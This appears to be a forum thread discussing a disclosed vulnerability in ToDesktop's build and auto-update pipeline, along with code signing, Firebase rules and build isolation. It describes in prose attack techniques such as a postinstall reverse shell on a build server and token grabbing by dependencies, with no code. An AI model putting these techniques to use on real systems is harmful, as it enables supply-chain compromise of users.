As an Electron maintainer, I'll re-iterate a warning I've told many people before: Your auto-updater and the underlying code-signing and notarization mechanisms are sacred. The recovery mechanisms for the entire system are extremely painful and often require embarrassing emails to customers. A compromised code-sign certificate is close to the top of my personal nightmares.
Dave and toDesktop have build a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often make an argument against too much abstraction and long dependency chain in those processes.
If you're an Electron developer (like the apps mentioned), I recommend:
* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic.
* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.
* You probably want to rotate your certificates if you ever gave anyone else access.
* Lastly, you should probably be the only one with the keys to your update server.
How about we don't build an auto-updater? Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible. Touching files on a user's system should be treated as a rare special occurrence. If a server is involved with the app, build a stable interface and think long and hard about every change. Meticulously version and maintain everything. If a server is involved, it is completely unacceptable for a server-side change to break an existing user's local application unless it is impossible to avoid - it should be seen as an absolute last resort with an apology to affected customers (agree with OP on this one).
It is your duty to make sure _all_ of your users are able to continue using the same software they installed in exactly the same way for the reasonable lifetime of their contract, the package, or underlying system (and that lifetime is measured in years/decades, with the goal of forever where possible. Not months).
You can, if you must, include an update notification, but this absolutely cannot disrupt the user's experience; no popups, do not require action, include an "ignore forever" button. If you have a good product with genuinely good feature improvements, users will voluntarily upgrade to a new package. If they don't, that is why you have a sales team.
Additionally, more broadly, it is not your app's job to handle updates. That is the job of your operating system and its package manager. But I understand that Windows is behind in this regard, so it is acceptable to compromise there.
We go a step further at my company. Any customer is able to request any previous version of their package at any time, and we provide them an Internet download page or overnight ship them a CD free of charge (and now USB too).
> Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible.
That sounds like a good idea. Unless you’re the vendor, and instead of 1000 support requests for version N, you’re now facing 100 support requests for version N, 100 for N−1, 100 for N−2, …, and 100 for N−9.
Have been there, done that.
The answer is a support window. If they are in bounds and have active maintenance contracts, support them.
If not, give them an option to get on support, or wish them luck.
Then the other answer is to really think releases through.
None of it is cheap. But it can be managed.
You're allowed to have a support matrix. You can refuse to support versions that are too old, but you can also just... let people keep using programs on their own computers.
Yep.
And anyone who does will find a percentage of users figure it out and then just get back to work.
Sounds like you come from the B2B, consultancyware or 6÷ figure/year license world.
For the vast realm of <300$/year products, the ones that actually use updaters, all your suggestions are completely unviable.
And it's not like B2B doesn't get whacked by bad software or bad actors regulalry. The idea that software updates itself is vastly more benefitial than harmful in the very long term. There so many old machines running outdated software in gated corporate networks, they will get owned immediately once a single one of them is compromised in any way. They are literally trading minor inconveniences for a massive time-bomb with a random timer.
The two sides of your thought are going head to head. "Gated corporate networks" don't benefit from software that "updates itself" (unless we're talking about pure SaaS). It's exactly where auto-updating is completely useless because any company with a functioning IT will go out of its way to not delegate the decisions of when to update or what features are forced in out to the developer and their product manager.
Auto-updates mostly ever practically happen for software used at home or SMB which might not have a functioning IT. If security is the concern why not use auto-updates only for security updates? Why am I gaining features I explicitly did not want, or losing the ones which were the reason I bought the software in the first place? Why does the dev think I am not capable of deciding for myself if or when to update? I have a solid theory of why and it involves an MBA-type person thinking anyone using <$300 software just can't think for themselves and if this line of thought cuts some costs or generates some revenue all the better.
> How about we don't build an auto-updater?
Sure. I’d rather have it be provided by the platform. It’s a lot of work to maintain for 5 OSs (3 desktop, 2 mobile).
> we should try our best to release complete software to users that will work as close to forever as possible
This isn’t feasible. Last I tried to support old systems on my app, the vendor (Apple) had stopped supporting and didn’t even provide free VMs. Windows 10 is scheduled for non-support this year (afaik). On Linux glibc or gtk will mess with any GUI app after a few years. If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about, they only have their own.
> Touching files on a user's system should be treated as a rare special occurrence.
Huh? That’s why I built an app and not a website in the first place. My app is networked both p2p and to api and does file transfers. And I’m supposed to not touch files?
> If a server is involved with the app, build a stable interface and think long and hard about every change.
Believe me, I do. These changes are as scary as database migrations. But like those, you can't avoid them forever. And for those cases, you need at the very least to let the user know what’s happening. That’s half of the update infrastructure.
Big picture, I can agree with the sentiment that ship fast culture has gone too far with apps and also we rely on cloud way too much. That’s what the local first movement is about.
At the same time, I disagree with the generalization seemingly based on a narrow stereotype of an app. For most non-tech users, non-disruptive background updates are ideal. This is what iOS does overnight when charging and on WiFi.
I have nothing against disabling auto updates for those who like to update their own software, but as a default it would lead to massive amounts of stale non-working software.
> file transfers. And I’m supposed to not touch files?
I'm pretty sure you know what I meant, it's obvious from context. System program files. The files that are managed by your user's package manager (and by extension their IT department)
There isn’t a package manager in many cases: windows store requires a MS account. macOS app store nerfs apps by sandbox restrictions. Linux has so many flavors of package managers it’s death by 1000 paper cuts. None of the major bundlers like flutter, electron and tauri support all these package managers and/or app stores. Let alone running the infrastructure for it.
Which leaves you with self-updaters. I definitely agree ideally it shouldn’t be the applications job to update itself. But we don’t live in that world atm. At the very least you need to check for updates and EOL circuit breakers for apps that aren’t forever- local only apps. Which is not a niche use-case even if local-first infra was mature and widely adopted, which it very much isn’t.
Anyway, my app works without internet, pulls no business logic at runtime (live updates) and it uses e2ee for privacy. That’s way more than the average ad-funded bait-and-switch ware that plague the majority of commercial software today. I wish I didn’t have to worry about updates, but the path to less worries and healthy ecosystem is not to build bug-free forever-software on top of a constantly moving substrate provided largely by corporations with multiple orders of magnitude more funding than the average software development company.
I do agree with you but I think that unfortunately you are wrong on the job of updates. You have an idealistic vision that I share but well, it remains idealistic.
Apart from, maybe, Linux distros, neither Apple or Microsoft are providing anything to handle updates that isn’t a proprietary store with shitty rules.
For sure the rules are broken on desktop OSs but by the meantime, you still have to distribute and update your software. Should the update be automatic ? No. Should you provide an easy way to update ? I’d said that at the end it depends on if you think it’s important to provide updates to your users. But should you except your users or their OSs to somehow update your app by themselves ? Nope.
This is actually precisely how package management works in Linux today... you release new versions, package maintainers package and release them, while ensuring they actually work. This is a solve problem, it's just that nobody writing JavaScript is old enough to realize it's an option.
And that's why I said "apart for Linux". Where are the package maintainers on the OSes everyone uses ? (and don't think that's sarcasm, I'm writing this comment on my linux desktop).
Homebrew and chocolatey?
My exact thought as well, simply point the user to a well established and proper channel for auto updates and then the dev simply needs to upload/release to said repos when a new version is put out. As an aside: Chocolatey is currently the only (stable/solid) way to consistently keep things up to date on the Win platform in my book.
Windows Store and winget. Developers are the ones behind the times.
This one is right.
Have a shoe-box key, a key which is copied 2*N (redundancy) times and N copies are stored in 2 shoe-boxes. It can be on tape, or optical, or silicon, or paper. This key always stays offline. This is your rootiest of root keys in your products, and almost nothing is signed by it. The next key down which the shoe-box key signs (ideally, the only thing) is for all intents and purposes your acting "root certificate authority" key running hot in whatever highly secure signing enclave you design for any other ordinary root CA setup. Then continue from there.
Your hot and running root CA could get totally pwned, and as long as you had come to Jesus with your shoe-box key and religiously never ever interacted with it or put it online in any way, you can sign a new acting root CA key with it and sign a revocation for the old one. Then put the shoe-box away.
I mean sure but is that possible for OS builds? Generally you will generate a private key, get a cert for it, give it to Apple so they sign it with their key and then you use the private key to sign your build. I have never seen a guide do a two level process and I am nof convinced it is allowed.
> It can be on tape, or optical, or silicon, or paper.
You can pick up a hardware security module for a few thousand bucks. No excuse not to.
I see a good excuse right there: the few thousand bucks.
I'd rather one the most reliable and cheap hardware security model we know of: paper.
Print a bunch of QR/datamatrix codes with your key. Keep one in a fireproof safe in your house, and another one elsewhere.
Total cost: ~$0.1 (+ the multipurpose safe, if needed)
Printers often have hard drives with cached pages
That's why you buy a printer, then destroy it with a baseball bat after you print.
It is a bit expensive when it gets to 5-10 printers but still cheaper than the thousands.
Question.
I've noticed a lot of websites import from other sites, instead of local.
<script src="scriptscdn.com/libv1.3">
I almost never see a hash in there. Is this as dangerous as it looks, why don't people just use a hash?
1. Yes
2. Because that requires you to know how to find the hash and add it.
Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML in the first place?) but they aren't incentivizes to have other sites use a hash.
Well, to be honest, the browsers could super easily solve that. In dev mode, just issue a warning "loaded script that has hash X but isn't statically defined. This is a huge security risk. Read more here" and that's it. Then you can just add the script, run the site, check the logs and add the hash, done.
You can define a CSP header to only exec 3rd Party scripts with known hashes
But that doesn't make it easy to integrate a new script from an author who doesn't provide the hash already.
I wish popular browsers would get together and release an update that says:
- After version X we are displaying a prominent popup if a script isn't loaded with a hash
- After version Y we blocking scripts loaded without hashes
They could solve this problem in a year or so, and if devs are too lazy to specify a hash when loading scripts then their site will break.
Yes it is. Hashes must absolutely be used in that case.
It should just not be done at all. But the main browser vendor loves tracking so they won't forbid this.
Are you saying Chrome should block all script includes that don't have hashes? That'll break tons of sites. See "Don't break the web"[1].
Disclosure: I work at Google, but not on Chrome.
[1] https://flbrack.com/posts/2023-02-15-dont-break-the-web/
Maybe, but just from a security point of view it's totally fine.
Getting tracked is less secure than not getting tracked.
Getting hacked is less secure than getting tracked.
> No magic.
There's plenty of magic. I think that Electron Forge does too many things, like trying to be the bundler. Is it possible to set up a custom build system / bundling with it or are you forced to use Vite? I guess that even if you can, you pull all those dependencies when you install it and naturally you can't opt out from that. Those dev dependencies involved in the build process are higher impact than some production dependencies that run in a sandboxed tab process (because a tiny malicious dependency could insert any code into the app's fully privileged process). I have not shipped my app yet, but I am betting on ESBuild (because it's just one Go binary) and Electron Builder (electron.build)
Hi. I'm an electron app developer. I use electron builder paired with AWS S3 for auto update.
I have always put Windows signing on hold due to the cost of commercial certificate.
Is the Azure Trusted Signing significantly cheaper than obtaining a commercial certificate? Can I run it on my CI as part of my build pipeline?
Azure Trusted Signing is one of the best things Microsoft has done for app developers last year, I'm really happy with it. It's $9.99/month and open both to companies and individuals who can verify their identity (it used to only be companies). You really just call signtool.exe with a custom dll.
I wrote @electron/windows-sign specifically to cover it: https://github.com/electron/windows-sign
Reference implementation: https://github.com/felixrieseberg/windows95/blob/master/forg...
The big limitation with Azure Trusted Signing is that your organization needs to be at least 3 years old. Seems to be a weird case where developers that could benefit from this solution are pushed towards doing something else, with no big reason to switch back later.
That limitation should go away when Trusted Signing graduates from preview to GA. The current limitation is because the CA rules say you must perform identity validation of the requester for orgs younger than 3 years old, which Microsoft isn't set up for yet.
This is not true. Or maybe it is but they missed me? I signed up with a brand new company without issue.
Hi. This is very helpful. Thanks for sharing!
> For Windows signing, use Azure Trusted Signing
I recently checked it out as an alternative to renewing our signing cert, but it doesn't support issuing EV certs.
I've understood it as having an EV code signing cert on Windows is required for drivers, but somehow also gives you better SmartScreen reputation making it useful even for user space apps in enterprisey settings?
Not sure if this is FUD spread by the EV CA's or not though?
Im not sure if they're technically considered EV but mine is linked to my corporation and I get no virus warnings at all during install.
[flagged]
And yet, tons of developers install github apps that ask for full permissions to control all repos and can therefore do to same things to every dev usings those services.
github should be ashamed this possibility even exists and double ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.
IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for and then for each repo, the specific permissions needed. They should be designed that minimal permissions is encouraged.
As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"
Why spend that effort when any code you run on your machine (such as dependency post-install scripts, or the dependencies themselves!) can just run `gh auth token` can grab a token for all the code you push up.
By design, the gh cli wants write access to everything on github you can access.
I will note that at least for our GitHub enterprise setup permissions are all granular, tokens are managed by the org and require an approval process.
I’m not sure how much of this is “standard” for an org though.
I personally haven't worked with many of the github apps that you seem to refer to but the few that I've used are only limited to access the specific repositories that I give and within those repositories their access control is scoped as well. I figured this is all stuff that can be controlled on Github's side. Am I mistaken?
Yeah, turns out "modern" software development has more holes than Swiss cheese. What else is new?
You know, there's this nice little thing called AppStore on the mac, and it can auto update
All apps on the Mac AppStore have to be sandboxed, which is great for the end-user, but a pain in the neck for the run of the mill electron app dev.
Question that I hope you can help me. I'm working on a Electron app that works offline. I am plan to sell it cheap, like $5 one payment.
It won't have licenses or anything, so if somebody wants to distribute it outside my website they will be able to do it.
If I just want to point to a exe file link in S3 without auto updates, should just compile and upload be enough?
Dave here, founder of ToDesktop. I've shared a write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...
This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.
> cannot happen again.
Hubris. Does not inspire confidence.
> We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.
After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?
Fair point. Perhaps better phrased as "to ensure this scenario can't recur.". I'll edit my post.
Yes, we re-architected our build container as part of remediation efforts, it was quite significant.
That was solid. Nice way to handle a direct personal judgement!
Not your first rodeo.
Another way is to avoid absolutes and ultimatums as aggressively as one should avoid personal judgements.
Better phrased as: "we did our best to prevent this scenario from happening again.
Fact is it just could happen! Nobody likes that reality, and overall when we think about all this stuff, networked computing is a sad state of affairs..
Best to just be 100 percent real about it all, if you ask me.
At the very least people won't nail you on little things, which leaves you something you may trade on when a big thing happens.
And yeah, this is unsolicited and worth exactly what you paid. Was just sharing where I ended up on these things in case it helps
Based on the claims on the blog, it feels reasonable to say that this "cannot" occur again.
Based on which claim? That 12 months from now they might accidentally discover a new bug just as serious?
If you think someone is obviously wrong, it might be worth pausing for a second and considering where you might just be referring to different things. Here, you seem to understand “this” to mean “a serious bug.” Since it’s obvious that a serious bug could happen, it seems likely that the author meant “this” to mean “the kind of bug that led to the breach we’re presently discussing.”
[flagged]
This is the wrong response, because that means that the learning would be lost. The security community didn't want that to happen when one of the CA's got a vulnerability, we do not want it to happen to other companies. We want companies to succeed and get better, being shameful doesn't help towards that. Learning the right lessons does, and resigning means that you are learning the wrong ones.
I don't think the lesson is lost. The opposite.
If you get a slap on the wrist, do you learn? No, you play it down.
However if a dev who gets caught doing a bad is forced to resign. Then all the rest of the devs doing the same thing will shape up.
I suggest reading one or two of Sydney Dekker’s books, which are a pretty comprehensive takedown of this idea. If an organization punishes mistakes, mistakes get hidden, covered up, and no less frequent.
Is it Dekker?
https://www.goodreads.com/book/show/578243.Field_Guide_to_Hu...
Sure is, autocorrect got me.
> If you get a slap on the wrist, do you learn? No, you play it down.
Except Dave didn't play it down. He's literally taking responsibility for a situation that could have resulted in significantly worse consequences.
Instead of saying, "nothing bad happened, let's move on," he, and by extension his company, have worked to remedy the issue, do a write up on it, disclose of the issue and its impact to users, and publicly apologize and hold themselves accountable. That right there is textbook engineering ethics 101 being followed.
> However if a dev who gets caught doing a bad is forced to resign.
then nearly everyone involved has incentive to coverup problem or to shift blame
Under what theory of psychology are you operating? This is along the same lines as the theory that punishment is an effective deterrent of crime, which we know isn’t true from experience.
While I think that resigning is stupid here, asserting that "punishment doesn't deter crime" is just absurd. It does!
The overwhelming majority of evidence suggests otherwise.
https://www.psychologytoday.com/us/blog/crime-and-punishment...
https://www.unsw.edu.au/newsroom/news/2020/07/do-harsher-pun...
https://www.ojp.gov/pdffiles1/nij/247350.pdf
https://www.helsinki.fi/en/news/economics/do-harsh-punishmen...
> While I think that resigning is stupid here, asserting that "punishment doesn't deter crime" is just absurd. It does!
Punishment does not deter crime. The threat of punishment does to a degree.
IOW, most people will be unaware of a person being sent to prison for years until and unless they have committed a similar offense. But everyone is aware of repercussions possible should they violate known criminal laws.
Can you back up your theory with the example of all the mistakes you have committed and force resigned taken?
this is probably one of the worst takes i've ever read on here
Honestly I don't get why people are hating this response so much.
Life is complex and vulnerabilities happen. They quickly contacted the reporter (instead of sending email to spam) and deployed a fix.
> we've fundamentally restructured our security practices to ensure this scenario can't recur
People in this thread seem furious about this one and I don't really know why. Other than needing to unpack some "enterprise" language, I view this as "we fixed some shit and got tests to notify us if it happens again".
To everyone saying "how can you be sure that it will NEVER happen", maybe because they removed all full-privileged admin tokens and are only using scoped tokens? This is a small misdirection, they aren't saying "vulnerabilities won't happen", but "exactly this one" won't.
So Dave, good job to your team for handling the issue decently. Quick patches and public disclosure are also more than welcome. One tip I'd learn from this is to use less "enterprise" language in security topics (or people will eat you in the comments).
Thank you.
Point taken on enterprise language. I think we did a decent job of keeping it readable in our disclosure write-up but you’re 100% right, my comment above could have been written much more plainly.
Our disclosure write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...
> We have reviewed logs and inspected app bundles.
Were the logs independent of firebase? (Could someone exploiting this vulnerability have cleaned up after themselves in the logs?)
Annual pen tests are great, but what are you doing to actually improve the engineering design process that failed to identify this gap? How can you possibly claim to be confident this won't happen again unless you myopically focus on this single bug, which itself is a symptom of a larger design problem.
These kinds of "never happen again" statements never age well, and make no sense to even put forward.
A more pragmatic response might look like: something similar can and probably will happen again, just like any other bugs. Here are the engineering standards we use ..., here is how they compare to our peers our size ..., here are our goals with it ..., here is how we know when to improve it...
How can -let's say- Cursor users be sure they were not compromised?
> No malicious usage was detected
Curious to hear about methods used if OK to share, something like STRIDE maybe?
from todesktop's report:
> Completed a review of the logs. Confirming all identified activity was from the researcher (verified by IP Address and user agent).
With privileged access, the attackers can tamper with the evidence for repudiation, so although I'd say "nothing in the logs" is acceptable, not everyone may. These two attack vectors are part of the STRIDE threat modeling approach.
They don’t elaborate on the logging details, but certainly must good systems don’t allow log tampering even for admins.
How confident are you that their log system is resilient, given the state of the rest of their software?
What horrible form not contacting affected customers right away after performing the patch.
Who knows what else was vulnerable in your infrastructure when you leaked .encrypted like that.
It should have been on your customers to decide if they still wanted to use your services.
how much of a bounty was paid to Eva for this finding?
> they were nice enough to compensate me for my efforts and were very nice in general.
They were compensated, but doesn't elaborate.
Sounds like it was handled better than the authors last article where the Arc browser company initially didn't offer any bounty for a similar RCE, then awarded a paltry $2k after getting roasted, and finally bumped it up to $20k after getting roasted even more.
They later updated their post, at the bottom:
> for those wondering, in total i got 5k for this vuln, which i dont blame todesktop for because theyre a really small company
50.000$ additional to the first 5.000$ :)
Woooowwww!
See latest line: "update: cursor (one of the affected customers) is giving me 50k USD for my efforts."
> for those wondering, in total i got 5k for this vuln
no offense man but this is totally inexcusable and there is zero chance i am ever touching anything made by y'all, ever
Good call. I'd seriously considering firing the developers responsible, too.
That's what a bad manager would do.
The employee made a mistake and you just paid for them to learn about it. Why would you fire someone you just educated?
[flagged]
It’s not a matter of good or bad, but a choice among alternatives?
Nobody gets fired: learning opportunity for next time, but little direct incentive to improve.
Fire someone: accountability theater (who is really responsible), loss of knowledge.
AFAIK, blameless postmortems and a focus on mechanisms to prevent repeats seems like the best we’ve come up with?
[dead]
This should be considered criminal negligence.
Don't worry man, it's way more embarassing for the people that downloaded your dep or any upstream tool.
If they didn't pay you a cent, you have no liability here.
This is not how the law works anywhere, thankfully.
Well for one it was a gift so there is no valid contract right? There are no direct damages because there is nothing paid and nothing to refund. Wrt indirect damages, there's bound to be a disclaimer or two, at least at the app layer.
IANAL, not legal advice
If you give someone a bomb, or give someone a USB stick with a virus, or give someone a car with defective break, you are absolutely liable. Think about it.
I’d suppose there is an ALL CAPS NO WARRANTY clause as well, as is customary with freeware (and FOSS). ToDesktop is a paid product, though.
This is the second big attack found by this individual in what... 6 months? The previous exploit (which was in Arc browser), also leveraged a poorly configured firebase db: https://kibty.town/blog/arc/
So this is to say, at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams something about the configuration process is being improperly communicated or overall is just too convoluted as a whole.
Firebase let's anyone get started in 30 seconds.
Details like proper usage, security, etc. Those are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.
I use firebase essentially for hobbyist projects for me and my friends.
If I had to guess these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.
> Google isn't to blame if you ship a paid product without running a security audit.
Arguably, if you provide a service that makes it trivial to create security issues (that is to say, you have to go out of your way to use it correctly) then it's your fault. If making it secure means making it somewhat less convenient, it's 100% your fault for not making it less convenient.
What if I need to hack together a POC for 3 people to look at.
It's my responsibility to make sure when we scale from 3 users to 30k users we take security seriously.
As my old auto shop teacher used to say, if you try to idiot proof something they'll build a better idiot.
Even if Google warns you in big bold print "YOU ARE DOING SOMETHING INSECURE", someone out there is going to click deploy anyway. You're arguing Google disable the deploy button, which I simply disagree with.
I think that's throwing the baby out with the bathwater; sane defaults are still an important thing to think about when developing a product. And for something as important as a database, which usually requires authentication or storing personal information, let your tutorials focus on these pain points instead of the promise of a database-driven app with only clientside code. It's awesome, but I think it deserves the notoriety for letting you shoot yourself in the foot and landing on the front page of HN. Author also found a similar exploit via Firebase for the Arc Browser[0]
I have a similar qualm with GraphQL.
[0] https://kibty.town/blog/arc/
I don't know what exactly happened here, but Firebase has two defaults. Test access rules which auto expire and are insecure, or production rules which require auth.
If you do something stupid, like keep ignoring the insecure warning and updating them so they don't expire, that's your fault.
In no other industry do workers blame their tools.
The issue usually lies in there not being enough security rules in place, not in keeping insecure rules active. For instance, for the Arc incident which we were given more information on, it was due to not having a security rule in place to prevent unauthorized users from updating the user_id on Arc Boosts in the Firestore.
Go into any other industry and hear when they say, "shoot yourself in the foot", and you've likely stumbled upon a situation where they blame their tools for making it too easy to do the wrong thing.
If you don't setup any access rules in Firebase, by default it'll deny access.
This means someone setup these rules improperly. Even if, you're responsible for the tools you use. We're a bunch of people getting paid 150k+ to type. It's not out of the question to read documentation and at a minimum understand how things work.
That said I don't completely disagree with you, if Firebase enables reckless behavior maybe it's not a good tool for production...
And I don't necessarily disagree either; good callout that it _was_ about improperly configured ACL's, I meant more that it wasn't related to keeping test rules alive.
For 150k+ salaries, frontend dev salaries are generally a lot less than their backend counterparts. And scrappy startups might not have cash for competitive salaries or senior engineers. I think these are a few of the reasons why Firebase becomes dangerous.
Any purported expert who uses software without considering its security is simply negligent. I'm not sure why people are trying to spin this to avoid placing the blame on the negligent programmer(s).
Weak programmers do this to defend this group making crap software. I agree that defaults should be secure and maybe there should be request limit on admin, full access token - but then people will just create another token with full access and use it.
Then you should have to click a big red button labelled "Enable insecure mode".
Defaults should be secure. Kind of blows my mind people still don't get this.
I’ve seen devs deploy production software with the admin password being “password”. I don’t think you are listening when they are saying “they’ll build a better idiot”.
Right because nobody ever makes a mistake.
That's why we don't have seatbelts of safety harnesses or helmets or RCDs. There's always going to be an idiot that drives without a seatbelt so why bother at all right?
When you drive without a seatbelt, it only affects you.
If you drive in a way that affects the safety of others, there are generally consequences.
Oh they are. Just like mongo and others. It’s a deliberate decision to remove basic security features in order to get traction.
Remove as much hurdles to increase adoption.
To be fair, Cursor does this quite handily also.
Should we outlaw C because it lets you dereference null pointers, too?
Erm yes! Even the White House has said that.
The only reason we didn't for so long was because we didn't have a viable alternative. Now we do, we should absolutely stop writing C.
The white house recently said a lot of things. But of all things, I don’t think they’re even qualified to have an opinion about software, or medical advice, or… well, anything that generally requires an expert.
I don't think Firebase is really at fault here—the major issue they highlighted is that the deployment pipeline uploaded the compiled artifact to a shared bucket from a container that the user controlled. This doesn't have anything to do with firebase—it would have been just as impactful if the container building the code uploaded it to S3 from the buildbot.
Agreed. I recently stumbled upon the fact that even Hacker News is using Firebase for exposing an API for articles. Caution should be taken when writing server-side software in general.
[flagged]
The problem is that if there is a security incident, basically nobody cares except for some of us here. Normal people just ignore it. Until that changes, nothing you do will change the situation.
I'm sorry, but when will we hold the writers of crappy code responsible for their own bad decisions? Let's start there.
I don't know but we're in a thread about Cursor... I don't think anyone is writing significantly better code using Cursor.
I always find unbelievable how we NEVER hold developers accountable. Any "actual" Engineer would be (at least the one signing off, but in software developers never sign off anything - and maybe that's the problem).
> update: cursor (one of the affected customers) is giving me 50k USD for my efforts.
Kudos to cursor for compensating here. They aren't necessarily obliged to do so, but doing so demonstrates some level of commitment to security and community.
"i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload"
Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it but that shouldn't be possible. Build machine shouldn't have outbound open internet access right?? Didn't see that explained clearly but maybe I'm missing something or misunderstanding.
In what world do you have a machine which downloads source code to build it, but doesn't have outbound internet access so it can't download source code or build dependencies?
Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?
And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.
The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.
It's common, doesn't mean it's secure. A lot of linux distros in their packaging will separate download (allows outbound to fetch dependencies), from build (no outside access).
Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.
Even if your builders are downloading dependencies on the fly, you can and should force that through an artifact repository (e.g. artifactory) you control. They shouldn't need arbitrary outbound Internet access. The builder needs a token injected with read-only pull permissions for a write-through cache and push permissions to the path it is currently building for. The only thing it needs to talk to is the artifactory instance.
In a world with an internal proxy/mirror for dependencies and no internet access allowed by build systems.
Which is not the world we live in.
s/we/I/
[flagged]
If you don't network isolate your build tooling then how do you have any confidence that your inputs are what you believe them to be? I run my build tools in a network namespace with no connection to the outside world. The dependencies are whatever I explicitly checked into the repo or otherwise placed within the directory tree.
You don't have any confidence beyond what lockfiles give you (which is to say the npm postinstall scripts could be very impure, non-hermetic, and output random strings). But if you require users to vendor all their dependencies, fully isolate all network traffic during build, be perfectly pure and reproducible and hermetic, presumably use nix/bazel/etc... well, you won't have any users.
If you want a perfectly secure system with 0 users, it's pretty easy to build that.
> But if you require users
I'm not suggesting that a commercial service should require this. You asked "In what world do you have ..." and I'm pointing out that it's actually a fairly common practice. Particularly in any security conscious environment.
Anyone not doing it is cutting corners to save time, which to be clear isn't always a bad thing. There's nothing wrong if my small personal website doesn't have a network isolated fully reproducible build. On the other hand, any widely distributed binaries definitely should.
For example, I fully expect that my bank uses network isolated builds for their website. They are an absolutely massive target after all.
Most banks and larger enterprises do exactly this. Devs don't get to go out and pick random libraries with out a code review and then it's placed on a local repository.
There are just far too many insecure and 'typo' malware to pull off the internet raw.
Hell, even just an unrestricted internal proxy at least gives you visibility after the fact.
This is npm with all dependencies stored in a directory. Check them in. You do code review your dependencies right? Everywhere I’ve worked in the last 10 years has required this. There is no fetching of dependencies in builds. Granted, this is harder to pull off if your devs are developing on a totally different cpu architecture than production (fuck you apple).
There are plenty of worlds that take security more seriously and practice defense in depth. Your response could use a little less hubris and a more genuinely inquisitive tone. Looks like others have already chimed in here but to respond to your (what feels like sarcasm) questions:
- You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.
Now sure if your build machine is still exposing everything on it to the user supplied code (instead of sandboxing the actual npm build/make/etc.. command) you could insert malicious code that zips up the whole filesystem, env vars, etc.. and exfiltrates them through your built app in this case snagging the secrets.
I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.
You have to meet your users where they are. Your users are not using nix and bazel, they're using npm and typescript.
If your users are using bazel, it's easy to separate "download" from "build", but if you're meeting your users over here where cows aren't spherical, you can't take security that seriously.
Security doesn't help if all your users leave.
The simple solution would be to check your node-modules folder into source control. Then your build machine wouldn’t need to download anything from anywhere except your repository.
you use a language where you have all your deps local to the repo? ie go vendor?
you can always limit said network access to npm.
You can't since a large number of npm post-install scripts also make random arbitrary network calls.
This includes things like downloading and compiling pre-compiled binaries for the native architecture hosted on random servers.
npm is really cool.
[flagged]
It's called air-gapping, and lots of adults do it.
Note that without a reverse shell you could still leak the secrets in the built artifact itself.
Isn't it really common for build machines to have outbound internet access? Millions of developers use GitHub Actions for building artifacts and the public runners definitely have outbound internet access
Indeed, you can indeed punch out from an actions runner. Such a thing is probably against GitHub's ToS, but I've heard from my third cousin twice removed that his friend once ssh'ed out from an action to a bastion host, then used port forwarding to get herself a shell on the runner in order to debug a failing build.
> probably against GitHub's ToS, but
Why would running code on a github action runner that's built to run code be against ToS?
If it was, I'm sure they'd ban the marketplace extensions that make it absolutely trivial to do this: https://github.com/marketplace/actions/debugging-with-ssh
could have just used https://github.com/mxschmitt/action-tmate
So this friend escaped from the ephemeral container VM into the build host which happened to have a private SSH on it that allowed it to connect to a bastion host to... go back to the build host and debug a failed build that should be self-contained inside the container VM which they already had access in the first place by the means of, you know, running a build on it? Interesting.
A few decades ago, it was also really common to smoke. Common != good, github actions isn't a true build tool, it's an arbitrary code runtime platform with a few triggers tied to your github.
It is and regardless a few other commenters saying or hinting it isn't...it is. An air gapped build machine wouldn't work for most software built today.
Strange. How do things like Nix work then? The nix builders are network isolated. Most (all?) Gentoo packages can also be built without network access. That seems like it should cover a decent proportion of modern software.
Instances where an air gapped build machine doesn't work are examples of developer laziness, not bothering to properly document dependencies.
Sounds like a problem with modern software build practices to me.
Ya too many people think it's a great idea to raw dog your ci/cd on the net and later get newspaper articles written about the data leak.
The number of packages that is malicious is high enough, then you have typo packages, and packages that get compromised at a later date. Being isolated from the net with proper monitoring gives a huge heads up when your build system suddenly tries to contact some random site/IP.
People don't think it's a great idea. In general, its just too much additional work/process - for very little benefit.
You're far more likely to encounter a security issue from adding/upgrading a dependency than your build process requiring internet access.
I'm a huge fan of the writing style. it's like hacking gonzo, but with literally 0 fluff. amazing work and an absolute delight to read from beginning to end
[flagged]
Obnoxious is a bit harsh - I liked the feeling it gave to the article, found it very readable and I had no trouble discerning sentences, especially with how they were broken up into paragraphs.
" please do not harass these companies or make it seem like it's their fault, it's not. it's todesktop's fault if anything) "
I don't get it. Why would it be "todesktop's fault", when all the mentioned companies allowed to push updates?
